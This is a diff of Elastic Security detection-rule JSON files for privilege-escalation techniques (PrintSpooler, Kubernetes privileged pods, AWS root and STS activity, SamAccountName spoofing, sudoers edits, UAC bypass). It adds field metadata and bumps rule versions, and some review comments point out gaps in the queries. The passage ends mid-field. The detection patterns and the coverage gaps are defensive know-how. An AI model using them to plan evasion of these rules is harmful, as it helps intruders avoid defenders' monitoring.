@@ -16,6 +16,23 @@ "https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Privilege%20Escalation/privesc_sysmon_cve_20201030_spooler.evtx", "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-1030" ], + "required_fields": [ + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "bd7eefee-f671-494e-98df-f01daf9e5f17", "severity": "high", @@ -44,5 +61,5 @@ } ], "type": "eql", - "version": 3 + "version": 4 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_service_suspicious_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_service_suspicious_file.json index 77fe2279b0bc8..22e6924a5dcbe 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_service_suspicious_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_service_suspicious_file.json 
@@ -12,14 +12,37 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PrintSpooler Service Executable File Creation", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type != \"deletion\" and process.name : \"spoolsv.exe\" and\n file.extension : (\"exe\", \"dll\") and\n not file.path : (\"?:\\\\Windows\\\\System32\\\\spool\\\\*\", \"?:\\\\Windows\\\\Temp\\\\*\", \"?:\\\\Users\\\\*\")\n", "references": [ "https://voidsec.com/cve-2020-1337-printdemon-is-dead-long-live-printdemon/", "https://www.thezdi.com/blog/2020/7/8/cve-2020-1300-remote-code-execution-through-microsoft-windows-cab-files" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "5bb4a95d-5a08-48eb-80db-4c3a63ec78a8", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -47,5 +70,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_file_deletion.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_file_deletion.json index d3847aa99e1ae..8ec2707ff5aa1 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_file_deletion.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_file_deletion.json 
@@ -15,13 +15,31 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious Print Spooler File Deletion", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "file where event.type : \"deletion\" and\n not process.name : (\"spoolsv.exe\", \"dllhost.exe\", \"explorer.exe\") and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\drivers\\\\x64\\\\3\\\\*.dll\"\n", "references": [ "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "c4818812-d44f-47be-aaef-4cfb2f9cc799", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Elastic", @@ -49,5 +67,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 3 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_spl_file.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_spl_file.json index c696aaaf8399e..9431df30a66cb 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_spl_file.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_printspooler_suspicious_spl_file.json 
@@ -12,13 +12,36 @@ "language": "eql", "license": "Elastic License v2", "name": "Suspicious PrintSpooler SPL File Created", - "note": "## Threat intel\n\nRefer to CVEs, CVE-2020-1048 and CVE-2020-1337 for further information on the vulnerability and exploit. Verify that the relevant system is patched.\n\n## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "## Threat intel\n\nRefer to CVEs, CVE-2020-1048 and CVE-2020-1337 for further information on the vulnerability and exploit. Verify that the relevant system is patched.", "query": "file where event.type != \"deletion\" and\n file.extension : \"spl\" and\n file.path : \"?:\\\\Windows\\\\System32\\\\spool\\\\PRINTERS\\\\*\" and\n not process.name : (\"spoolsv.exe\",\n \"printfilterpipelinesvc.exe\",\n \"PrintIsolationHost.exe\",\n \"splwow64.exe\",\n \"msiexec.exe\",\n \"poqexec.exe\")\n", "references": [ "https://safebreach.com/Post/How-we-bypassed-CVE-2020-1048-Patch-and-got-CVE-2020-1337" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.extension", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "a7ccae7b-9d2c-44b2-a061-98e5946971fa", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", 
@@ -46,5 +69,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_privileged_pod_created.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_privileged_pod_created.json new file mode 100644 index 0000000000000..fae09d7b99d87 --- /dev/null +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_privileged_pod_created.json 
@@ -0,0 +1,69 @@ +{ + "author": [ + "Elastic" + ], + "description": "This rule detects when a user creates a pod/container running in privileged mode. A highly privileged container has access to the node's resources and breaks the isolation between containers. If compromised, an attacker can use the privileged container to gain access to the underlying host. Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.", + "false_positives": [ + "By default a container is not allowed to access any devices on the host, but a \"privileged\" container is given access to all devices on the host. This allows the container nearly all the same access as processes running on the host. An administrator may want to run a privileged container to use operating system administrative capabilities such as manipulating the network stack or accessing hardware devices from within the cluster." 
+ ], + "index": [ + "logs-kubernetes.*" + ], + "language": "kuery", + "license": "Elastic License v2", + "name": "Kubernetes Privileged Pod Created", + "note": "", + "query": "kubernetes.audit.objectRef.resource:pods and kubernetes.audit.verb:create and\n kubernetes.audit.requestObject.spec.containers.securityContext.privileged:true\n", + "references": [ + "https://media.defense.gov/2021/Aug/03/2002820425/-1/-1/1/CTR_KUBERNETES%20HARDENING%20GUIDANCE.PDF", + "https://kubernetes.io/docs/tasks/configure-pod-container/security-context/" + ], + "required_fields": [ + { + "ecs": false, + "name": "kubernetes.audit.objectRef.resource", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.requestObject.spec.containers.securityContext.privileged", + "type": "unknown" + }, + { + "ecs": false, + "name": "kubernetes.audit.verb", + "type": "unknown" + } + ], + "risk_score": 47, + "rule_id": "c7908cac-337a-4f38-b50d-5eeb78bdb531", + "setup": "The Kubernetes Fleet integration with Audit Logs enabled or similarly structured data is required to be compatible with this rule.", + "severity": "medium", + "tags": [ + "Elastic", + "Kubernetes", + "Continuous Monitoring", + "Execution", + "Privilege Escalation" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0004", + "name": "Privilege Escalation", + "reference": "https://attack.mitre.org/tactics/TA0004/" + }, + "technique": [ + { + "id": "T1611", + "name": "Escape to Host", + "reference": "https://attack.mitre.org/techniques/T1611/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "query", + "version": 2 +} diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_rogue_windir_environment_var.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_rogue_windir_environment_var.json index d94fdbc846847..b9b45b6318976 100644 
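Review bot: The KQL only inspects `spec.containers`, so a pod whose privileged flag lives in `spec.initContainers[].securityContext.privileged` is created without an alert even though the init container reaches the node with the same host access; I would extend the query to `kubernetes.audit.objectRef.resource:pods and kubernetes.audit.verb:create and (kubernetes.audit.requestObject.spec.containers.securityContext.privileged:true or kubernetes.audit.requestObject.spec.initContainers.securityContext.privileged:true)` and add the second field to `required_fields`. Nothing restricts the audit stage or response code, so if the integration forwards both the RequestReceived and ResponseComplete stages, or admission-denied requests, the rule will likely double-fire or alert on pods that were never admitted — worth confirming on sample data and, if so, adding a stage filter such as `kubernetes.audit.stage:ResponseComplete`. The `note` is shipped empty; a short investigation guide pointing the analyst at the requesting identity and the target namespace recorded in the audit event would help triage.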
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_rogue_windir_environment_var.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_rogue_windir_environment_var.json @@ -14,6 +14,18 @@ "references": [ "https://www.tiraniddo.dev/2017/05/exploiting-environment-variables-in.html" ], + "required_fields": [ + { + "ecs": true, + "name": "registry.data.strings", + "type": "wildcard" + }, + { + "ecs": true, + "name": "registry.path", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "d563aaba-2e72-462b-8658-3e5ea22db3a6", "severity": "high", @@ -50,5 +62,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 4 + "version": 5 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_crontab_filemod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_crontab_filemod.json index 57f893168ba57..68850cf6ae57f 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_crontab_filemod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_crontab_filemod.json @@ -16,6 +16,28 @@ "https://phoenhex.re/2017-06-09/pwn2own-diskarbitrationd-privesc", "https://www.exploit-db.com/exploits/42146" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "0ff84c42-873d-41a2-a4ed-08d74d352d01", "severity": "high", 
@@ -52,5 +74,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_login_without_mfa.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_login_without_mfa.json index 33b5cd400fd33..e743943997a1c 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_login_without_mfa.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_root_login_without_mfa.json 
@@ -15,13 +15,53 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Root Login Without MFA", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", + "note": "## Triage and analysis\n\n### Investigating AWS Root Login Without MFA\n\nMulti-factor authentication (MFA) in AWS is a simple best practice that adds an extra layer of protection on top of your\nuser name and password. With MFA enabled, when a user signs in to an AWS Management Console, they will be prompted for\ntheir user name and password, as well as for an authentication code from their AWS MFA device. Taken together, these\nmultiple factors provide increased security for your AWS account settings and resources.\n\nFor more information about using MFA in AWS, access the [official documentation](https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_mfa.html).\n\nThe AWS root account is the one identity that has complete access to all AWS services and resources in the account,\nwhich is created when the AWS account is created. AWS strongly recommends that you do not use the root user for your\neveryday tasks, even the administrative ones. Instead, adhere to the best practice of using the root user only to create\nyour first IAM user. Then securely lock away the root user credentials and use them to perform only a few account and\nservice management tasks. Amazon provides a [list of the tasks that require root user](https://docs.aws.amazon.com/general/latest/gr/root-vs-iam.html#aws_tasks-that-require-root).\n\nThis rule looks for attempts to log in to AWS as the root user without using multi-factor authentication (MFA), meaning\nthe account is not secured properly. 
\n\n#### Possible investigation steps\n\n- Investigate other alerts associated with the user account during the past 48 hours.\n- Examine whether this activity is common in the environment by looking for past occurrences on your logs.\n- Consider the source IP address and geolocation for the calling user who issued the command. Do they look normal for the\n calling user?\n- Examine the commands, API calls, and data management actions performed by the account in the last 24 hours.\n- Contact the account owner and confirm whether they are aware of this activity.\n- If you suspect the account has been compromised, scope potentially compromised assets by tracking access to servers,\nservices, and data accessed by the account in the last 24 hours.\n\n### False positive analysis\n\n- While this activity is not inherently malicious, the root account must use MFA. The security team should address any\npotential benign true positive (B-TP), as this configuration can risk the entire cloud environment.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Identify the services or servers involved criticality.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify if there are any regulatory or legal ramifications related to this activity.\n- Configure multi-factor authentication for the user.\n- Follow security best practices [outlined](https://aws.amazon.com/premiumsupport/knowledge-center/security-best-practices/) by AWS.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the\nmean time to respond (MTTR).", "query": 
"event.dataset:aws.cloudtrail and event.provider:signin.amazonaws.com and event.action:ConsoleLogin and\n aws.cloudtrail.user_identity.type:Root and\n aws.cloudtrail.console_login.additional_eventdata.mfa_used:false and\n event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/IAM/latest/UserGuide/id_root-user.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.console_login.additional_eventdata.mfa_used", + "type": "boolean" + }, + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "bc0c6f0d-dab0-47a3-b135-0925f0a333bc", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "high", "tags": [ "Elastic", @@ -50,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 5 + "version": 7 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_samaccountname_spoofing_attack.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_samaccountname_spoofing_attack.json index 7e52ab1c3fd52..708cd3a1d8a0e 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_samaccountname_spoofing_attack.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_samaccountname_spoofing_attack.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Privileged Escalation via SamAccountName Spoofing", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "iam where event.action == \"renamed-user-account\" and\n /* machine account name renamed to user like account name */\n winlog.event_data.OldTargetUserName : \"*$\" and not winlog.event_data.NewTargetUserName : \"*$\"\n", "references": [ "https://support.microsoft.com/en-us/topic/kb5008102-active-directory-security-accounts-manager-hardening-changes-cve-2021-42278-5975b463-4c95-45e1-831a-d120004e258e", @@ -20,8 +20,26 @@ "https://twitter.com/exploitph/status/1469157138928914432", "https://exploit.ph/cve-2021-42287-cve-2021-42278-weaponisation.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.NewTargetUserName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.OldTargetUserName", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "bdcf646b-08d4-492c-870a-6c04e3700034", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -72,5 +90,5 @@ ], "timestamp_override": "event.ingested", "type": "eql", - "version": 2 + "version": 4 } 
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_assumerole_usage.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_assumerole_usage.json index 4688d4cb79b81..96fc3e8b44447 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_assumerole_usage.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_assumerole_usage.json 
@@ -13,13 +13,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS Security Token Service (STS) AssumeRole Usage", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:sts.amazonaws.com and event.action:AssumedRole and \naws.cloudtrail.user_identity.session_context.session_issuer.type:Role and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:sts.amazonaws.com and event.action:AssumedRole and\naws.cloudtrail.user_identity.session_context.session_issuer.type:Role and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/STS/latest/APIReference/API_AssumeRole.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.session_context.session_issuer.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "93075852-b0f5-4b8b-89c3-a226efae5726", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -70,5 +105,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 2 + "version": 4 } 
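Review bot: The query keeps `event.action:AssumedRole`, but the STS API action — and therefore the CloudTrail `eventName` — is `AssumeRole`; `AssumedRole` is a `userIdentity.type` value, not an event name. If `event.action` is populated from `eventName` as the other AWS rules in this diff assume (`ConsoleLogin`, `GetSessionToken`), this rule cannot match any event and the version bump ships a dead detection — confirm against a CloudTrail sample and change the clause to `event.action:AssumeRole`. Adding `required_fields` and `related_integrations` metadata cannot catch this, so exercising the prepackaged queries against fixture events from the pinned cloudtrail package would be the durable fix.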
diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_getsessiontoken_abuse.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_getsessiontoken_abuse.json index c5e2669c1fade..a01af42f30a00 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_getsessiontoken_abuse.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sts_getsessiontoken_abuse.json 
@@ -13,13 +13,48 @@ "language": "kuery", "license": "Elastic License v2", "name": "AWS STS GetSessionToken Abuse", - "note": "## Config\n\nThe AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", - "query": "event.dataset:aws.cloudtrail and event.provider:sts.amazonaws.com and event.action:GetSessionToken and \naws.cloudtrail.user_identity.type:IAMUser and event.outcome:success\n", + "note": "", + "query": "event.dataset:aws.cloudtrail and event.provider:sts.amazonaws.com and event.action:GetSessionToken and\naws.cloudtrail.user_identity.type:IAMUser and event.outcome:success\n", "references": [ "https://docs.aws.amazon.com/STS/latest/APIReference/API_GetSessionToken.html" ], + "related_integrations": [ + { + "integration": "cloudtrail", + "package": "aws", + "version": "1.10.2" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "aws.cloudtrail.user_identity.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.provider", + "type": "keyword" + } + ], "risk_score": 21, "rule_id": "b45ab1d2-712f-4f01-a751-df3826969807", + "setup": "The AWS Fleet integration, Filebeat module, or similarly structured data is required to be compatible with this rule.", "severity": "low", "tags": [ "Elastic", @@ -70,5 +105,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 1 + "version": 3 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudo_buffer_overflow.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudo_buffer_overflow.json index 1c7a064131171..e68eb5a7e8ebf 100644 
--- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudo_buffer_overflow.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudo_buffer_overflow.json @@ -21,6 +21,28 @@ "https://www.bleepingcomputer.com/news/security/latest-macos-big-sur-also-has-sudo-root-privilege-escalation-flaw", "https://www.sudo.ws/alerts/unescape_overflow.html" ], + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "f37f3054-d40b-49ac-aa9b-a786c74c58b8", "severity": "high", @@ -56,5 +78,5 @@ "value": 100 }, "type": "threshold", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudoers_file_mod.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudoers_file_mod.json index 963c16ae4dd61..6a4493f2746db 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudoers_file_mod.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_sudoers_file_mod.json 
@@ -12,6 +12,23 @@ "license": "Elastic License v2", "name": "Sudoers File Modification", "query": "event.category:file and event.type:change and file.path:(/etc/sudoers* or /private/etc/sudoers*)\n", + "required_fields": [ + { + "ecs": true, + "name": "event.category", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "file.path", + "type": "keyword" + } + ], "risk_score": 47, "rule_id": "931e25a5-0f5e-4ae0-ba0d-9e94eff7e3a4", "severity": "medium", @@ -49,5 +66,5 @@ ], "timestamp_override": "event.ingested", "type": "query", - "version": 7 + "version": 8 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_suspicious_dnshostname_update.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_suspicious_dnshostname_update.json index 07d373f3a2151..d96edca66b593 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_suspicious_dnshostname_update.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_suspicious_dnshostname_update.json 
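Review bot: `event.type:change` only matches modification of an existing file, yet the `file.path:(/etc/sudoers* or /private/etc/sudoers*)` wildcard is clearly meant to cover `/etc/sudoers.d/`, where the usual escalation move is to drop a brand-new file — an event that Elastic Endpoint and Auditbeat report as `creation` rather than `change`, as far as I recall, so it would not alert. I would widen the clause to `event.category:file and event.type:(change or creation) and file.path:(/etc/sudoers* or /private/etc/sudoers*)` and mention package managers writing to `sudoers.d` in the false-positive notes. The rule object begins above this hunk; its version bump is the second hunk on this line.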
@@ -16,6 +16,63 @@ "https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4", "https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2022-26923" ], + "required_fields": [ + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.outcome", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.id", + "type": "keyword" + }, + { + "ecs": true, + "name": "source.ip", + "type": "ip" + }, + { + "ecs": true, + "name": "user.domain", + "type": "keyword" + }, + { + "ecs": true, + "name": "user.name", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.DnsHostName", + "type": "unknown" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.SubjectUserName", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.event_data.TargetLogonId", + "type": "keyword" + }, + { + "ecs": false, + "name": "winlog.logon.type", + "type": "unknown" + } + ], "risk_score": 73, "rule_id": "6bed021a-0afb-461c-acbe-ffdb9574d3f3", "severity": "high", @@ -57,5 +114,5 @@ } ], "type": "eql", - "version": 1 + "version": 2 } diff --git a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_clipup.json b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_clipup.json index 86d43189c8207..b0b1442858efb 100644 --- a/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_clipup.json +++ b/x-pack/plugins/security_solution/server/lib/detection_engine/rules/prepackaged_rules/privilege_escalation_uac_bypass_com_clipup.json 
@@ -12,13 +12,41 @@ "language": "eql", "license": "Elastic License v2", "name": "UAC Bypass Attempt with IEditionUpgradeManager Elevated COM Interface", - "note": "## Config\n\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.\n", + "note": "", "query": "process where event.type in (\"start\", \"process_started\") and process.name : \"Clipup.exe\" and\n not process.executable : \"C:\\\\Windows\\\\System32\\\\ClipUp.exe\" and process.parent.name : \"dllhost.exe\" and\n /* CLSID of the Elevated COM Interface IEditionUpgradeManager */\n process.parent.args : \"/Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}\"\n", "references": [ "https://github.com/hfiref0x/UACME" ], + "required_fields": [ + { + "ecs": true, + "name": "event.type", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.executable", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.name", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.args", + "type": "keyword" + }, + { + "ecs": true, + "name": "process.parent.name", + "type": "keyword" + } + ], "risk_score": 73, "rule_id": "b90cdde7-7e0d-4359-8bf0-2c112ce2008a", + "setup": "If 